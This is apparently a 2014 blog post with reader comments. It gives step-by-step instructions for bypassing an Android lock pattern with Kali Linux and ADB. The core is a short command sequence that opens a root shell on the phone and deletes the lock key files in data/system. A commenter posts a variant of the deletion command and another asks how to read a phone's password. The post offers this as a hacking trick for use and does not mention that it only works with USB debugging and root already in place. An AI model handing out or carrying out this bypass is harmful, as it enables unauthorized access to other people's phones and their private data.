Sunday, 6 July 2014

How to Bypass Android Lock Patter using Kali Linux

Requirements for this Attack :
  1. Kali Linux
  2. An Android phone
  3. USB cable
  4. ADB Android Tool

Step 1.


1.First Boot your Kali Linux Distribution


2.Connect your phone to your PC using USB
 cable.

Step 2. 


1. Open up Terminal

 For Installing ADB over terminal

2.Boot into any Linux distro you have.

2.On your Terminal type :


#sudo apt-get install android-tools-adb


This will install ADB Android Tool on your Kali Linux Machine.

Step 3. 


Disabling pattern unlock over terminal

1.Open up terminal again and type :


#adb devices
#adb shell
#cd data/system
#su
#rm *.key


Now,

disconnect your phone and reboot.
Unlock pattern should be here. 
Just try some random gesture and it will get unlocked.

Enjoy the Hacking Tricks by Tapan Jha (Cyber Security Expert)

3 comments:

  1. Replies
    1. i made a change and it worked #rm *.*key

      Delete
  2. can unlock the android for a while without removing the lock
    or can we see the password by connecting it to a pc

    ReplyDelete